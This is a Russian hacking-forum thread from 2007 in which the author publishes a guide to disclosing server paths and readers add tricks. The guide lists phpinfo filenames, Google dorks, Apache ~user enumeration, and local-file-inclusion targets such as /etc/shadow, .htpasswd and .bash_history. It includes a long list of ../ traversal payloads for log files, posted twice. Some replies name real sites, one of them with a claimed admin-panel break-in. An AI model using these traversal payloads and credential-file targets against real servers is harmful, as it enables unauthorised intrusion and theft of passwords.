Авторские статьи Раскрытие Пути.

Discussion in 'Статьи' started by guest3297, 5 Jan 2007.

  1. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Раскрытие Пути.


    Последнее время стало появляться много тем как раскрыть локальный путь на сайте. Я попытаюсь рассказать как это можно сделать. Ну во первых зачем его раскрывать... это может into_outfile или нужно имя юзера, или еще что то извращенное нашим умом.

    И так начем:
    1) Файлы с phpinfo()
    Code:
    info.php
    phpinfo.php
    php.php
    test.php
    testphpinfo.php
    testing.php
    info.php
    inf.php
    это далеко не полный список и бывает такое что они находяться не только в корне но и в др папках например /admin/


    2) Вывод ошибок:

    Нам надо спровоцировать сервер на вывод ошибки любой что он написал в какой строчки крипта ошибка...
    как это сделать можно ручками можно сканером.

    3) Поиск директорий и файлов.
    Способ который я очень часто использую, все знаю о существовании cgi сканеров которые сканят на папки и файлы и вот составив внушительный лист этот сканер становиться бесценным. Тоесть мы ищем папки и файлы на которые нету ссылок не где... что может быть в таких папках/файлах ну то что там может быть не устовленный скрипт или просто без конфига то вероятность вывода ошибок повышаеться в 10 раз.

    4)Поиск юзера.
    Многие скептически относяться к это баги... но если сайт на cgi то 90% взлома. Сначало о чнем я говорю не многие думаю поймут. http://site.ru/~root/ возвращает нам 403 значит поиск юзеров разрешен как же его искать например
    gazprom.ru/~gazprom.ru
    gazprom.ru/~gazpromru
    gazprom.ru/~gazpromr
    gazprom.ru/~gazprom
    gazprom.ru/~gazpr
    и так далее.

    Что же нам это даст? Просмотр папки cgi-bin и то имя которое используеться в /etc/passwd
    (Эта уязвимость присутствует только в апаче при включенном mod_user)

    5)Ошибки в cgi.
    В cgi так же есть аналоги phpinfo + именно ошибки в cgi-bin будть то скуль или иклуд. Например из стандартных файлов хостера printenv.pl который выводит путь.

    6)Хостер
    Можно просто представиться клинтом и спросить любой путь (если мы знаем имя нашего юзера действуем по аналогии).
    Можно поискать ошибки на сайтах которые хостяться рядом и по аналогии если нам известно имя юзера, составить свой путь.

    7)Поисковые системы.

    Очень часто в поисковиках остаються те или иные баги... запечатленные на сайтах это может быть временный отказ бд или или отказ в открытие сессии.
    Поиск осуществляем.
    Code:
    site:target.com
    Будет полезно почитать весь листинг, но если он очень большой то юзаем примерно такие запросы тут все зависит от фантазии.
    Code:
    site:target.com Warning
    site:target.com on line
    site:target.com mysql_fetch_array()
    
    Ну и так далее.

    8(new))Логический перебор.
    Не знаю как правильно назвать этот способ, вообщем случай у нас будет такой есть локальный инклуд или load_file в sql, И нас необходимо узнать путь что бы прочесть тот или иной(способов взлома в такой ситуации много но остановимся именно на чтении файлов и поиске путя до www) Сначало подумает что нам может помочь вообще???

    1) Утсновленная ОС
    2)Сервер (http)
    3)тип сервера (хостинг/vds/vps/отдельная станция)
    4)Список юзеров (/etc/passwd)
    5)Конфиги логи и все что мы сможем найти.
    6)Кофе Сигареты и много терпения.

    И так я рассмотрю OC *nix и сервер apache как самые частые.
    ну начнем с определения oс в этом на поможет nmap или любой другой сканер можем так же воспользоваться telenet :). Определили стоит linux. Для начала прочтем /etc/passwd найдем своего юзера и посмотрим его домашний каталог. определяем какуюто страничку на сервере например site.com/index.htm теперь мы имеем подобную загадку /home/user/***/***/ ... /index.htm
    теперь начинаем перебирать в таком стиле:
    Code:
    /home/user/www/index.htm
    /home/user/html/index.htm
    /home/user/site/www/index.htm
    /home/user/sites/site.com/index.htm
    Скажу что за 2 часа ручного перебора и разумеется богатого воображения можно перебрать практически все возможные варианты.
    Code:
    USER CONFS
    
    /.bash_history
    /.htpasswd
    /.htaccess
    /etc/.htpasswd
    /etc/shadow
    /root/.bash_history
    
    HTTPD
    
    /usr/local/apache/conf/httpd.conf
    /usr/apache/conf/httpd.conf
    /usr/local/httpd/conf/httpd.conf
    /usr/local/http/conf/httpd.conf
    /usr/http/conf/httpd.conf
    /usr/httpd/conf/httpd.conf
    В конфигах апача можно найти реальный путь и еще много чего интересного.

    ищем логи
    Code:
    
    ../../../../../../../../../../../../var/log/httpd/access_log
    ../../../../../../../../../../../../var/log/httpd/error_log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../apache/logs/error.log
    ../../../../apache/logs/access.log
    ../../../../../apache/logs/error.log
    ../../../../../apache/logs/access.log
    ../../../../../../apache/logs/error.log
    ../../../../../../apache/logs/access.log
    ../../../../../../../apache/logs/error.log
    ../../../../../../../apache/logs/access.log
    ../../../../../../../../apache/logs/error.log
    ../../../../../../../../apache/logs/access.log
    ../../../logs/error.log
    ../../../logs/access.log
    ../../../../logs/error.log
    ../../../../logs/access.log
    ../../../../../logs/error.log
    ../../../../../logs/access.log
    ../../../../../../logs/error.log
    ../../../../../../logs/access.log
    ../../../../../../../logs/error.log
    ../../../../../../../logs/access.log
    ../../../../../../../../logs/error.log
    ../../../../../../../../logs/access.log
    ../../../../../../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../../../../../../var/www/logs/access_log
    ../../../../../../../../../../../../var/www/logs/access.log
    ../../../../../../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../../../../../../var/log/apache/access_log
    ../../../../../../../../../../../../var/log/apache/access.log
    ../../../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../../../var/www/logs/error_log
    ../../../../../../../../../../../../var/www/logs/error.log
    ../../../../../../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../../../../../../var/log/apache/error_log
    ../../../../../../../../../../../../var/log/apache/error.log
    ../../../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../../../var/log/error_log
    Поиск с ../../../ применять только при инклудах.

    Пока все ждите обновлений.
     
    #1 guest3297, 5 Jan 2007
    Last edited: 4 Feb 2007
    16 people like this.
  2. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    RE:"
    3) Поиск директорий и файлов.
    Способ который я очень часто использую, все знаю о существовании cgi сканеров которые сканят на папки и файлы и вот составив внушительный лист этот сканер становиться бесценным. Тоесть мы ищем папки и файлы на которые нету ссылок не где... что может быть в таких папках/файлах ну то что там может быть не устовленный скрипт или просто без еонфига то вероятность вывода ошибок повышаеться в 10 раз.
    "
    - вот именно этим я и заморочился здесь->http://forum.antichat.ru/showthread.php?p=259242
    Так что предлагаю совместными усилиями пополнять этот список=)
     
    #2 Xex, 5 Jan 2007
    Last edited: 5 Jan 2007
  3. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    2. Я такие встречал
     
    1 person likes this.
  4. ArdeOS

    ArdeOS Elder - Старейшина

    Joined:
    16 Jul 2004
    Messages:
    137
    Likes Received:
    64
    Reputations:
    15
    очень маленькая статья получилась, ну да ладно, в конце сам написал что будет дополнена - будем ждать.

    И еще исправь - без еонфига, скиптичиски, редом ...
     
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2ArdeOS
    испраил.
    2max_pain89
    добавил.
     
  6. Robin_Hood

    Robin_Hood Elder - Старейшина

    Joined:
    30 Oct 2006
    Messages:
    144
    Likes Received:
    155
    Reputations:
    47
    небольшое дополнение:
    забыл про гугл)
    оч редко админы заморачиваются с роботс.тхт
     
  7. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    незачот..

    тема ебли не раскрыта

    p.s. в ирке я тебе описывал еще варианты
     
    #7 k1b0rg, 6 Jan 2007
    Last edited: 7 Jan 2007
    1 person likes this.
  8. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2k1b0rg
    Обновил.

    2Robin_Hood
    Обновил.
     
    #8 guest3297, 6 Jan 2007
    Last edited: 6 Jan 2007
  9. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Че то у меня нифига неполучаеться
    http://www.rl3.ru/~root/ Выводит 403 ошибку
    А http://www.rl3.ru/~rl3ru/ просто заново загружает сайт
     
  10. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    _http://www.rl3.ru/~rl3ru/cgi-bin/
    _http://www.rl3.ru/~root/ ты не прочтешь...
     
    1 person likes this.
  11. D=P=CH= MOD=

    D=P=CH= MOD= Elder - Старейшина

    Joined:
    15 Aug 2006
    Messages:
    249
    Likes Received:
    195
    Reputations:
    15
    Добавлю...

    Очень хороший сканер, ищущий директории файлов это IntelliTamper .
    Сам юзаю.

    А вобще интересная статья +.
     
    1 person likes this.
  12. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2D=P=CH= MOD=

    Полное гавно так как ищет линкованные страницы и все это еще и грузит на комп море трафика и 0 пользы учитывая что все эти ссылки ты можешь найти сам.
    Если хочешь действительно хорошего результата использую свой спиок файлов и папок у меня например щас 34.000 записей, иногда подобный скан заменяет ls.
     
  13. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Обновленно.

    8(new))Логический перебор.
    Не знаю как правильно назвать этот способ, вообщем случай у нас будет такой есть локальный инклуд или load_file в sql, И нас необходимо узнать путь что бы прочесть тот или иной(способов взлома в такой ситуации много но остановимся именно на чтении файлов и поиске путя до www) Сначало подумает что нам может помочь вообще???

    1) Утсновленная ОС
    2)Сервер (http)
    3)тип сервера (хостинг/vds/vps/отдельная станция)
    4)Список юзеров (/etc/passwd)
    5)Конфиги логи и все что мы сможем найти.
    6)Кофе Сигареты и много терпения.

    И так я рассмотрю OC *nix и сервер apache как самые частые.
    ну начнем с определения oс в этом на поможет nmap или любой другой сканер можем так же воспользоваться telenet :). Определили стоит linux. Для начала прочтем /etc/passwd найдем своего юзера и посмотрим его домашний каталог. определяем какуюто страничку на сервере например site.com/index.htm теперь мы имеем подобную загадку /home/user/***/***/ ... /index.htm
    теперь начинаем перебирать в таком стиле:
    Code:
    /home/user/www/index.htm
    /home/user/html/index.htm
    /home/user/site/www/index.htm
    /home/user/sites/site.com/index.htm
    Скажу что за 2 часа ручного перебора и разумеется богатого воображения можно перебрать практически все возможные варианты.
    Code:
    USER CONFS
    
    /.bash_history
    /.htpasswd
    /.htaccess
    /etc/.htpasswd
    /etc/shadow
    /root/.bash_history
    
    HTTPD
    
    /usr/local/apache/conf/httpd.conf
    /usr/apache/conf/httpd.conf
    /usr/local/httpd/conf/httpd.conf
    /usr/local/http/conf/httpd.conf
    /usr/http/conf/httpd.conf
    /usr/httpd/conf/httpd.conf
    В конфигах апача можно найти реальный путь и еще много чего интересного.

    ищем логи
    Code:
    
    ../../../../../../../../../../../../var/log/httpd/access_log
    ../../../../../../../../../../../../var/log/httpd/error_log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../apache/logs/error.log
    ../../../../apache/logs/access.log
    ../../../../../apache/logs/error.log
    ../../../../../apache/logs/access.log
    ../../../../../../apache/logs/error.log
    ../../../../../../apache/logs/access.log
    ../../../../../../../apache/logs/error.log
    ../../../../../../../apache/logs/access.log
    ../../../../../../../../apache/logs/error.log
    ../../../../../../../../apache/logs/access.log
    ../../../logs/error.log
    ../../../logs/access.log
    ../../../../logs/error.log
    ../../../../logs/access.log
    ../../../../../logs/error.log
    ../../../../../logs/access.log
    ../../../../../../logs/error.log
    ../../../../../../logs/access.log
    ../../../../../../../logs/error.log
    ../../../../../../../logs/access.log
    ../../../../../../../../logs/error.log
    ../../../../../../../../logs/access.log
    ../../../../../../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../../../../../../var/www/logs/access_log
    ../../../../../../../../../../../../var/www/logs/access.log
    ../../../../../../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../../../../../../var/log/apache/access_log
    ../../../../../../../../../../../../var/log/apache/access.log
    ../../../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../../../var/www/logs/error_log
    ../../../../../../../../../../../../var/www/logs/error.log
    ../../../../../../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../../../../../../var/log/apache/error_log
    ../../../../../../../../../../../../var/log/apache/error.log
    ../../../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../../../var/log/error_log
    Поиск с ../../../ применять только при инклудах.

    Пока все ждите обновлений.
     
    1 person likes this.
  14. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Респектище огромный!!! Помогло после долгих мучений найти полный путь! Google.ru rulez, автору +!
     
    1 person likes this.
  15. f1rebl00d

    f1rebl00d Elder - Старейшина

    Joined:
    27 Dec 2006
    Messages:
    25
    Likes Received:
    34
    Reputations:
    15
    Есче на ксакепе писали про раскрытие путей.

    Можа параметр передать в переменную как массив, подставим в имени переменной [] квадратные скобочки
    http://www.oclcpica.org/?id[]=2&ln=uk

    Даж в админку так попал :)
    http://www.woolsnz-college.com/admin/frameset.php3?post[]=1
     
    #15 f1rebl00d, 22 Aug 2007
    Last edited: 22 Aug 2007
    1 person likes this.
  16. Lancellot

    Lancellot Member

    Joined:
    9 Aug 2006
    Messages:
    138
    Likes Received:
    23
    Reputations:
    7
    хорошая статья!!!
    не посоветуете какой нибудь сканер cgi уязвимостей в котором можно постоянно обновлять базу?
     
  17. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2Lancellot
    Сканер acceess diver.
    Базу надо самому дополнять.

    Разберусь с машиной напишу дополнение к статье.
     
    1 person likes this.
  18. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    Кстати вариант насчет ошибок - довольно часто прокатывает такое:
    допустим скрипт использует php-сессии (session_start и аналогичное) и включен режим отображения ошибок. Тогда если подставить в идентификатор сессии (в куках или в url) символы не из алфавитноцифрового набора, например точку ".", то интерпретатор PHP выдаст ошибку о неправильных символах в идентификаторе сессии, с раскрытием пути.
     
    1 person likes this.
  19. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Переменная называеться phpsid в оригинале. Достаточно подставить любой сивнол который не A-Z a-z 0-9
     
  20. DIAgen

    DIAgen Banned Life!

    Joined:
    2 May 2006
    Messages:
    1,055
    Likes Received:
    376
    Reputations:
    460
    А закрыть это можно просто написав
    PHP:
    @session_start();